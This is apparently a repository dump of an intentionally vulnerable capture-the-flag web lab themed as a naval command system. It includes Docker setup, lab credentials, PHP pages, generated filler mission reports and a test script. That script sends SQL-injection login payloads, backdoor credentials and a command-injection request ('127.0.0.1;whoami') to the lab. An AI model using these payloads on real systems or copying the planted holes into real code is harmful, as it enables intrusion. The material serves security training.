17 | 18 | Submitted by: Brian Parsons 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_5.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #5 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Incentivize B2B Roi 9 | - Objective: Future-proofed directional model 10 | - Location: Wilsonborough, Mayotte 11 | - Start Time: 2025-01-15 20:28:08 12 | - End Time: 2025-03-28 20:42:09 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Yard first police then business population manage break. Moment in weight stuff music seven care season. Hour shake share four like recent each. Entire similar peace father few road. South finally turn fish time any not. 17 | 18 | Submitted by: Kimberly Nixon 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_8.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #8 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Transition World-Class Architectures 9 | - Objective: Compatible disintermediate challenge 10 | - Location: North Carlosmouth, Saint Vincent and the Grenadines 11 | - Start Time: 2025-02-13 14:36:03 12 | - End Time: 2025-03-11 15:58:49 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Better modern teach mouth science. Significant along lot cost stop how. Number experience wife protect employee effort compare. Light practice truth. Difficult raise goal. 
17 | 18 | Submitted by: Zachary Cooley 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /static/less/animated.less: -------------------------------------------------------------------------------- 1 | // Animated Icons 2 | // -------------------------- 3 | 4 | .@{fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .@{fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /static/scss/_animated.scss: -------------------------------------------------------------------------------- 1 | // Spinning Icons 2 | // -------------------------- 3 | 4 | .#{$fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .#{$fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: 
rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /missions/mission_report_14.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #14 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Mesh Open-Source Methodologies 9 | - Objective: Triple-buffered non-volatile Internet solution 10 | - Location: Williamsburgh, Chad 11 | - Start Time: 2025-01-13 02:23:00 12 | - End Time: 2025-01-19 13:10:24 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Treatment teach agent instead national economic little. Security rate crime reflect force training toward. Increase news data a drop. Situation them law listen source message. Evening pattern anyone occur. 17 | 18 | Submitted by: Katherine Montgomery 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_15.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #15 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Benchmark Frictionless Experiences 9 | - Objective: Multi-tiered optimal model 10 | - Location: Lake Morgan, Mexico 11 | - Start Time: 2025-03-28 15:29:59 12 | - End Time: 2025-01-27 00:38:02 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Tend thus summer treat several. Future according million peace husband decade ready. Travel marriage like range fish win technology. Politics tough major myself green business address. Get in both forward cup. Per view close interview they per structure. 
17 | 18 | Submitted by: Kenneth Fuller 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_4.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #4 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Integrate Mission-Critical Web-Readiness 9 | - Objective: User-centric methodical time-frame 10 | - Location: Lake Jasonhaven, Angola 11 | - Start Time: 2025-01-11 21:58:44 12 | - End Time: 2025-03-03 06:48:15 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Win open modern somebody play significant. Compare which now lose. She role family debate note likely director network. Level under morning wrong change fact us. Inside agreement character there now center writer. Whose truth better camera statement. 17 | 18 | Submitted by: George Tate 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_9.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #9 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Deploy Customized Models 9 | - Objective: Mandatory uniform time-frame 10 | - Location: Adkinschester, Andorra 11 | - Start Time: 2025-03-22 09:11:03 12 | - End Time: 2025-01-06 18:04:45 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Resource performance from say toward detail a meeting. Table station door since probably expert audience. American or around goal. View number organization near shoulder pressure speech. 
Land successful member imagine military particularly. High again shake director enjoy until. 17 | 18 | Submitted by: Alan Carey 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_7.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #7 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Productize Innovative E-Business 9 | - Objective: Proactive static adapter 10 | - Location: South Stephanie, Cocos (Keeling) Islands 11 | - Start Time: 2025-02-10 15:14:25 12 | - End Time: 2025-01-13 09:23:33 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Including month environment also. Hour another maintain physical whole close raise. Lead mention our talk move something. Voice us grow between deal hear world. The enjoy when how product ball audience everything. Reduce reason cup serve. Support next over start mission. 
17 | 18 | Submitted by: Robert Hernandez 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Nana Sei Anyemedu 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
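22 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
FROM php:8.1-apache

# Install the mysqli extension the PHP code uses to talk to MariaDB.
RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli

# Extra tooling for the CTF (shell-in-container convenience). netcat is also
# what a reverse-shell payload from the intentional command-injection sink
# would reach for, so it is part of the exercise rather than an accident.
RUN apt-get update && apt-get install -y \
    mariadb-client \
    vim \
    curl \
    netcat-traditional \
    && rm -rf /var/lib/apt/lists/*

# Copy application files.
# NOTE(review): `COPY .` ships the whole checkout into the document root,
# including FLAGS.md, HINTS.md, REPORT_TEMPLATE.md, docker-compose.yml
# (database credentials), setup.sh / reset.sh / test_vulnerabilities.sh,
# secure_example/ and any .git directory present at build time. Unless the
# repo's .htaccess blocks them, every one of those is fetchable over HTTP and
# the answer key leaks for free. Add a .dockerignore (or copy only the app
# directories) before hosting this for other players.
COPY . /var/www/html/

# Writable directories. Apache in this image runs its workers as www-data, so
# owning the directories by www-data with 775 gives the application exactly
# the access it had; 777 additionally made them writable by any account that
# lands on the box, which is a primitive the lab does not intend to hand out.
# Note that docker-compose.yml bind-mounts ./logs and ./mission_uploads over
# these paths, so at runtime those two carry the host directory's permissions,
# not the ones set here — only missions/ is governed by this layer.
RUN chown -R www-data:www-data /var/www/html/logs \
        /var/www/html/mission_uploads \
        /var/www/html/missions \
    && chmod 775 /var/www/html/logs \
        /var/www/html/mission_uploads \
        /var/www/html/missions

# Pre-create the log files the PHP code appends to so the first request does
# not fail on a missing file. Same ownership reasoning as above (664 vs 666).
RUN touch /var/www/html/logs/access.log \
    && touch /var/www/html/logs/admin_activity.log \
    && touch /var/www/html/logs/backup_access.log \
    && touch /var/www/html/logs/upload.log \
    && touch /var/www/html/logs/sqli_debug.log \
    && touch /var/www/html/logs/player_progress.log \
    && chown www-data:www-data /var/www/html/logs/*.log \
    && chmod 664 /var/www/html/logs/*.log

# mod_rewrite for the rules in the repo's .htaccess.
RUN a2enmod rewrite

# Let .htaccess override settings under the document root.
# NOTE(review): in this listing the sed range began with an empty address
# (`//`), which GNU sed rejects with "no previous regular expression" and
# which would fail the build. The start pattern was evidently stripped as a
# tag when the page was rendered; the stock apache2.conf block that carries
# `AllowOverride None` for the docroot is `<Directory /var/www/>`, which is
# what is used here — confirm against the upstream file.
RUN sed -i '/<Directory \/var\/www\/>/,/<\/Directory>/ s/AllowOverride None/AllowOverride All/' /etc/apache2/apache2.conf

# Expose port 80
EXPOSE 80

# Start Apache
CMD ["apache2-foreground"]
--------------------------------------------------------------------------------
/honeypot_trap.php:
--------------------------------------------------------------------------------
1 | 9 | 10 | 11 | 12 | Bot Detected 13 | 28 | 29 | 30 |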

BOT DETECTED

31 |

Your automated attack tools have been identified. (If you didn't use one then you are a bot in human form)

32 |

We've logged your IP and user agent.(Just Joking)

33 |

Real hackers don't use scripts - try harder!

34 | 35 |
36 |   _____
37 |  /     \
38 |  | () () |
39 |  \  ^  /
40 |   |||||
41 |   |||||
42 |     
43 | 44 |

This is not the real system. Go back and try again.

45 | 46 | 47 | -------------------------------------------------------------------------------- /admin/log_viewer.php: -------------------------------------------------------------------------------- 1 | 24 | 25 | 26 | 27 | Log Viewer | <?= ucfirst($log) ?> Log 28 | 29 | 30 | 31 | 32 | 38 | 39 |
40 |

Log

41 |
42 |
43 |
44 |
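45 | 46 | 47 |
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.8'

# Deliberately vulnerable CTF lab. Everything in the `web` service is meant
# to be broken; what is NOT meant to happen is for the database or phpMyAdmin
# to be reachable from whatever network the Docker host sits on. The db and
# phpmyadmin port mappings are therefore bound to the loopback interface;
# the players' attack surface (port 80) is unchanged. If phpMyAdmin is itself
# an intended remote target in your deployment, publish it deliberately.
services:
  web:
    build: .
    container_name: hive_naval_web
    ports:
      - "80:80"
    volumes:
      # Bind mounts: these sit on top of the chmod done in the Dockerfile, so
      # the host directories' permissions are what the PHP code actually sees.
      - ./logs:/var/www/html/logs
      - ./mission_uploads:/var/www/html/mission_uploads
    depends_on:
      - db
    networks:
      - hive_network
    environment:
      # Plaintext credentials are part of the information-disclosure track
      # (the Dockerfile copies this file into the document root). Keep them
      # unique to this lab and never reuse them anywhere real.
      - DB_HOST=db
      - DB_NAME=hive_naval
      - DB_USER=hive_user
      - DB_PASS=N@vyS3cr3t!

  db:
    image: mariadb:10.11
    container_name: hive_naval_db
    environment:
      MYSQL_ROOT_PASSWORD: rootpassword
      MYSQL_DATABASE: hive_naval
      MYSQL_USER: hive_user
      MYSQL_PASSWORD: N@vyS3cr3t!
    volumes:
      # officers.sql is not in the repository listing; presumably produced by
      # setup.sh (reset.sh reloads it as well). Confirm it exists before
      # `docker-compose up`, otherwise the schema is never loaded.
      - ./officers.sql:/docker-entrypoint-initdb.d/01-schema.sql
      - db_data:/var/lib/mysql
    networks:
      - hive_network
    ports:
      # Loopback only. The web container reaches db over hive_network by
      # service name, so this mapping exists purely for the operator's mysql
      # client. Previously "3306:3306", which exposed root/rootpassword to
      # every host that could reach this machine.
      - "127.0.0.1:3306:3306"

  phpmyadmin:
    image: phpmyadmin:latest
    container_name: hive_naval_phpmyadmin
    environment:
      PMA_HOST: db
      PMA_USER: hive_user
      PMA_PASSWORD: N@vyS3cr3t!
    ports:
      # Same reasoning: an auto-logged-in phpMyAdmin is a full DB console.
      - "127.0.0.1:8080:80"
    depends_on:
      - db
    networks:
      - hive_network

networks:
  hive_network:
    driver: bridge

volumes:
  db_data:
--------------------------------------------------------------------------------
/assets/style-enhanced.css:
--------------------------------------------------------------------------------
body {
  font-family: Arial, sans-serif;
  background: #046d09;
  margin: 0;
  padding: 0;
}

h2 {
  text-align: center;
  color: #dde7df;
  font-size: 40px;
}

form {
  max-width: 800px;
  margin: 50px auto;
  padding: 50px;
  border: 2px solid #080808;
  background: white;
  border-radius: 10px;
  box-shadow: 0 0 20px rgba(22, 22, 22, 0.1);
}

input[type="text"],
input[type="password"],
input[type="email"] {
  width: 95%;
  font-size: 24px;
  padding: 10px;
  margin: 10px 0;
  border: 1px solid #a8a6a6;
  border-radius: 5px;
}

button {
  width: 50%;
  text-align: center;
  margin-left: 10em;
  margin-top: 20px;
  justify-content: center;
  font-size: 20px;
  padding: 10px;
  background-color: #023a0c;
  color: white;
  font-weight: bold;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

button:hover {
  background-color: #098b2a;
}

p {
  text-align: center;
  color: red;
}

.signup-text {
  color: white;
  text-align: center;
  font-size: 20px;
  margin-top: 20px;
  margin-bottom: 20px;
}

.signup-text a {
  color: #25098b;
  text-decoration: none;
  font-weight: bold;
}
--------------------------------------------------------------------------------
/admin/emergency_access.php:
--------------------------------------------------------------------------------
1 | "; 6 | echo "SELF DESTRUCT SEQUENCE INITIATED\n"; 7 | for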
($i=10; $i>0; $i--) { 8 | echo "$i...\n"; 9 | sleep(1); 10 | } 11 | echo "Just kidding! This is a test system.\n"; 12 | echo "But you found the Easter egg!\n"; 13 | echo ""; 14 | exit(); 15 | } 16 | } 17 | ?> 18 | 19 | 20 | 21 | Emergency Access 22 | 45 | 46 | 47 |

EMERGENCY ACCESS PORTAL

48 |

Enter destruct code:

49 |
50 | 51 | 52 |
53 | 54 | 55 | -------------------------------------------------------------------------------- /static/less/mixins.less: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | .fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | .fa-icon-rotate(@degrees, @rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation})"; 16 | -webkit-transform: rotate(@degrees); 17 | -ms-transform: rotate(@degrees); 18 | transform: rotate(@degrees); 19 | } 20 | 21 | .fa-icon-flip(@horiz, @vert, @rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=@{rotation}, mirror=1)"; 23 | -webkit-transform: scale(@horiz, @vert); 24 | -ms-transform: scale(@horiz, @vert); 25 | transform: scale(@horiz, @vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | .sr-only() { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 
45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | .sr-only-focusable() { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /static/scss/_mixins.scss: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | @mixin fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | @mixin fa-icon-rotate($degrees, $rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation})"; 16 | -webkit-transform: rotate($degrees); 17 | -ms-transform: rotate($degrees); 18 | transform: rotate($degrees); 19 | } 20 | 21 | @mixin fa-icon-flip($horiz, $vert, $rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}, mirror=1)"; 23 | -webkit-transform: scale($horiz, $vert); 24 | -ms-transform: scale($horiz, $vert); 25 | transform: scale($horiz, $vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 
30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | @mixin sr-only { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | @mixin sr-only-focusable { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /log_flag.php: -------------------------------------------------------------------------------- 1 | 'Invalid data']); 14 | exit; 15 | } 16 | 17 | $flag_id = $data['flag_id'] ?? ''; 18 | $flag_value = $data['flag_value'] ?? ''; 19 | $points = $data['points'] ?? 0; 20 | $timestamp = $data['timestamp'] ?? date('Y-m-d H:i:s'); 21 | 22 | // Get player info 23 | $player_ip = $_SERVER['REMOTE_ADDR']; 24 | $player_username = $_SESSION['user']['username'] ?? 'anonymous'; 25 | $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown'; 26 | 27 | // Log to file 28 | $log_entry = sprintf( 29 | "[%s] Player: %s | IP: %s | Flag: %s | Value: %s | Points: %d\n", 30 | $timestamp, 31 | $player_username, 32 | $player_ip, 33 | $flag_id, 34 | $flag_value, 35 | $points 36 | ); 37 | 38 | file_put_contents( 39 | __DIR__ . '/logs/player_progress.log', 40 | $log_entry, 41 | FILE_APPEND | LOCK_EX 42 | ); 43 | 44 | // Also log to detailed JSON log for leaderboard 45 | $json_log_file = __DIR__ . 
'/logs/player_progress.json'; 46 | $json_logs = []; 47 | 48 | if (file_exists($json_log_file)) { 49 | $json_logs = json_decode(file_get_contents($json_log_file), true) ?: []; 50 | } 51 | 52 | $json_logs[] = [ 53 | 'timestamp' => $timestamp, 54 | 'player' => $player_username, 55 | 'ip' => $player_ip, 56 | 'flag_id' => $flag_id, 57 | 'flag_value' => $flag_value, 58 | 'points' => $points, 59 | 'user_agent' => $user_agent 60 | ]; 61 | 62 | file_put_contents( 63 | $json_log_file, 64 | json_encode($json_logs, JSON_PRETTY_PRINT), 65 | LOCK_EX 66 | ); 67 | 68 | echo json_encode(['success' => true, 'message' => 'Flag logged successfully']); 69 | ?> 70 | -------------------------------------------------------------------------------- /fake_dashboard.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | Naval Command Dashboard 15 | 41 | 42 | 43 |
44 |

! WARNING !

45 |

You've reached a FAKE dashboard

46 | 47 |
48 | ____ 49 | / \ 50 | | STOP | 51 | \____/ 52 | | | 53 | / \ 54 | | TRY | 55 | \____/ 56 | HARDER 57 |
58 | 59 |

Your Hacking Attempt:

60 | 65 | 66 |

Fake Data Exposed:

67 |

• Nuclear Codes: 12345

68 |

• Admin Password: password123

69 |

• Secret Base: 42.3647° N, 71.1042° W

70 | 71 | 72 |
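73 | 74 | 75 |
--------------------------------------------------------------------------------
/reset.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# HIVE Naval System - Reset Script
# Resets the CTF lab to its initial state: reloads the schema, empties the
# log files, removes player uploads and clears PHP session files.
# Must run as root (it chmods the web-writable directories and touches
# /tmp session files).

echo "🚢 HIVE Naval System - Reset Script"
echo "===================================="
echo ""

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Check if running as root/sudo
if [ "$EUID" -ne 0 ]; then
  echo -e "${RED}Please run as root or with sudo${NC}"
  exit 1
fi

# Every path below (officers.sql, logs/, mission_uploads/) is relative to the
# repository root. Previously the script used whatever directory the caller
# happened to be in, so `sudo /path/to/reset.sh` from elsewhere failed step 1
# and, worse, ran `chmod 777` against an unrelated `logs` directory.
cd "$(dirname "$0")" || { echo -e "${RED}Cannot change to the script directory${NC}"; exit 1; }

echo -e "${YELLOW}This will reset the database and clear all logs and uploads.${NC}"
read -p "Are you sure you want to continue? (y/N) " -n 1 -r
echo
if [[ ! $REPLY =~ ^[Yy]$ ]]; then
  echo "Reset cancelled."
  exit 1
fi

echo ""
echo "Step 1: Resetting database..."
if [ ! -f officers.sql ]; then
  echo -e "${RED}✗ officers.sql not found in $(pwd)${NC}"
  exit 1
fi
# `-p` with no value makes mysql prompt for the root password instead of
# taking it from argv, where it would be visible in `ps`. Keep it that way.
if mysql -u root -p hive_naval < officers.sql; then
  echo -e "${GREEN}✓ Database reset successfully${NC}"
else
  echo -e "${RED}✗ Database reset failed${NC}"
  exit 1
fi

echo ""
echo "Step 2: Clearing log files..."
# Truncate in place (creates the file if it is missing), same as `> file`.
for log in access admin_activity backup_access upload sqli_debug player_progress; do
  : > "logs/$log.log"
done
# log_flag.php also keeps a JSON copy of the leaderboard next to the .log
# file; leaving it behind carried scores across resets.
rm -f logs/player_progress.json
echo -e "${GREEN}✓ Log files cleared${NC}"

echo ""
echo "Step 3: Clearing uploaded files..."
# `find -delete` exits 0 whether or not it removed anything, so the old
# "$? -eq 0" check could never reach the "nothing to clear" branch. Note this
# also removes the sample files tracked in mission_uploads/ (restore them
# with git if the lab depends on them).
uploads=$(find mission_uploads -type f ! -name '.gitkeep' 2>/dev/null)
if [ -n "$uploads" ]; then
  find mission_uploads -type f ! -name '.gitkeep' -delete 2>/dev/null
  echo -e "${GREEN}✓ Uploaded files cleared${NC}"
else
  echo -e "${YELLOW}⚠ No uploaded files to clear${NC}"
fi

echo ""
echo "Step 4: Resetting file permissions..."
# World-writable mirrors what the Dockerfile does: the PHP code needs the web
# server to write here and the web-server user is not known on a native
# install. If it is known (www-data, apache), `chown -R <user> logs
# mission_uploads` with 775/664 is the tighter equivalent.
chmod 777 logs
chmod 777 mission_uploads
chmod 666 logs/*.log 2>/dev/null
echo -e "${GREEN}✓ Permissions reset${NC}"

echo ""
echo "Step 5: Clearing session files..."
# NOTE(review): this runs as root and deletes every PHP session file on this
# host, not only this lab's, and it is a no-op for the Docker deployment
# (sessions live inside the web container). Restrict it if other PHP
# applications share the machine.
rm -f /tmp/sess_* 2>/dev/null
echo -e "${GREEN}✓ Sessions cleared${NC}"

echo ""
echo -e "${GREEN}========================================${NC}"
echo -e "${GREEN}✓ Reset complete!${NC}"
echo -e "${GREEN}========================================${NC}"
echo ""
echo "The CTF lab has been reset to its initial state."
echo "You can now start fresh!"
echo ""
echo "To start the lab:"
echo "  - Native: Access http://localhost/"
echo "  - Docker: Run 'docker-compose up -d'"
echo ""
--------------------------------------------------------------------------------
/admin/backup_db.php:
--------------------------------------------------------------------------------
1 | 0) { 25 | // Get column names from the first row 26 | $firstRow = mysqli_fetch_assoc($result); 27 | fputcsv($output, array_keys($firstRow)); 28 | fputcsv($output, $firstRow); 29 | 30 | // Fetch remaining rows 31 | while ($row = mysqli_fetch_assoc($result)) { 32 | fputcsv($output, $row); 33 | } 34 | } else { 35 | fputcsv($output, ["No data found in $table"]); 36 | } 37 | fputcsv($output, []); 38 | } 39 | fclose($output); 40 | exit(); 41 | } 42 | 43 | // Regular HTML output 44 | ?> 45 | 46 | 47 | 48 | Database Backup Portal 49 | 93 | 94 | 95 | 96 |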
97 |

Naval Database Backup

98 | DOWNLOAD FULL DATABASE (CSV) 99 | 100 |

Raw Data Preview:

101 |
102 |          0) {
113 |                 while ($row = mysqli_fetch_assoc($result)) {
114 |                     // Avoid exposing passwords
115 |                     if (isset($row['password'])) {
116 |                         $row['password'] = '[REDACTED]';
117 |                     }
118 |                     print_r($row);
119 |                 }
120 |             } else {
121 |                 echo "No data or error in $table\n";
122 |             }
123 |             echo "\n";
124 |         }
125 | 
126 |         // Secure logging (optional, but improved)
127 |         file_put_contents(
128 |             '../logs/backup_access.log',
129 |             date('Y-m-d H:i:s') . " - Accessed by: " . $_SERVER['REMOTE_ADDR'] . "\n",
130 |             FILE_APPEND
131 |         );
132 |         ?>
133 |         
134 |
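135 | 136 | 137 |
--------------------------------------------------------------------------------
/test_vulnerabilities.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# HIVE Naval System - Vulnerability Test Script
# Smoke-tests that the intentional vulnerabilities are still reachable: each
# test fires one request at $TARGET and greps the response for a marker.
# A PASS proves only that the marker string came back, not that the issue is
# exploitable — keep the markers specific to the vulnerable code path.

echo "🔍 HIVE Naval System - Vulnerability Test Suite"
echo "================================================"
echo ""

# Configuration (TARGET can be overridden from the environment:
# `TARGET=http://10.0.0.5 ./test_vulnerabilities.sh`).
TARGET="${TARGET:-http://localhost}"
PASSED=0
FAILED=0

# Colors
GREEN='\033[0;32m'
RED='\033[0;31m'
YELLOW='\033[1;33m'
NC='\033[0m'

# test_vulnerability NAME COMMAND EXPECTED
#   NAME     - label printed for the test
#   COMMAND  - shell command line, evaluated as written (usually curl)
#   EXPECTED - grep basic-regex that must match somewhere in the output
# Increments PASSED or FAILED; never exits.
test_vulnerability() {
    local name=$1
    local command=$2
    local expected=$3
    local result

    echo -n "Testing $name... "

    # An empty pattern matches every line, so a test whose marker is missing
    # would always pass. Report it as a broken test instead of a green one.
    if [ -z "$expected" ]; then
        echo -e "${RED}✗ FAIL${NC} (no expected marker given)"
        ((FAILED++))
        return
    fi

    # Quoted so the command line reaches eval as written; unquoted it was
    # word-split and glob-expanded once before eval even saw it.
    result=$(eval "$command" 2>&1)

    if echo "$result" | grep -q -e "$expected"; then
        echo -e "${GREEN}✓ PASS${NC}"
        ((PASSED++))
    else
        echo -e "${RED}✗ FAIL${NC}"
        ((FAILED++))
    fi
}

echo "Starting vulnerability tests..."
echo ""

# Test 1: SQL Injection
echo "=== Authentication Vulnerabilities ==="
test_vulnerability \
    "SQL Injection Login" \
    "curl -s -X POST $TARGET/login.php -d 'username=admin'\''--&password=test' -L" \
    "admin"

# Test 2: Default Credentials
test_vulnerability \
    "Default Credentials (carl)" \
    "curl -s -X POST $TARGET/login.php -d 'username=carl&password=ilovemywife' -L" \
    "carl"

# Test 3: Backdoor Account
test_vulnerability \
    "Backdoor Account (navyseal)" \
    "curl -s -X POST $TARGET/login.php -d 'username=navyseal&password=open sesame' -L" \
    "navyseal"

# Test 4: Debug Mode
test_vulnerability \
    "Debug Information Leak" \
    "curl -s -X POST $TARGET/login.php -d 'username=debug&password=test'" \
    "Debug: Query was"

echo ""
echo "=== Command Injection Vulnerabilities ==="

# Test 5: Command Injection in Dashboard
test_vulnerability \
    "Command Injection (ping)" \
    "curl -s '$TARGET/dashboard.php?check_status=127.0.0.1;whoami'" \
    "www-data\|root\|apache"

# Test 6: File Upload (check if upload page is accessible)
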